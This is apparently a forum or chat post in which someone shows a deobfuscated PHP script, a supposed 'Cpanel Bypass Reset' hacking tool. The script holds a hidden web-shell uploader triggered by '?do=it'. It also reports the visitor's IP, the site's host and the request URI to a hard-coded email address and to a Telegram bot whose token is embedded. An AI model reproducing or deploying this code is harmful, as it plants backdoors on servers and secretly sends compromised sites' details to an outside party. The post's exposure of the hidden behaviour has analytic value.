bruh bro
decoded ur code
<?php
/*
*/
$token = "1668617372:AAFPcOUIMUxSyHV3a7uZjwDtObWUMAoEdOo";
$tkn = "1044924770";
$do = $_GET['do'];
if ($do == 'it') {
$doshell = $_FILES['file']['name'];
$doit = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload shell' />
</form>";
move_uploaded_file($doit, $doshell);
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " Hello Babe :) |$ip";
$email = "
[email protected]";
$from = "From: Unknown<x-GhostDz>";
$b75 = $_SERVER['REQUEST_URI'];
$a45 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$a45$b75 $m22";
mail($email, $subj98, $msg8873, $from);
function sendMessage($tkn, $msg8873, $token) {
$url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $tkn;
$url = $url . "&text=" . urlencode($msg8873);
$ch = curl_init();
$optArray = array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true
);
curl_setopt_array($ch, $optArray);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
sendMessage($tkn, $msg8873 , $token);
echo '<html>
<head>
<title>Bypass Cpanel Security </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body {
background-image: url("https://i.ibb.co/Pm49tdm/t.jpg");
}
h2{
color:#0000FF;
}
</style>
</head>
<br><body>
<!--SCC -->
<center>
<div style="border-radius: 20px;border: 2px solid #2980B9;padding: 8px 4px;width: 25%;line-height: 24px;background: #000;color:#0000FF;">
<p><h2>Cpanel Bypass Reset</h2></p>
<p><h2>from shell</h2></p>
<p>
<form action="#" method="post">
<input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" />
<input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/>
</form>
<br /><br /><br />
</p>
</div>
</center>
</body>
</html>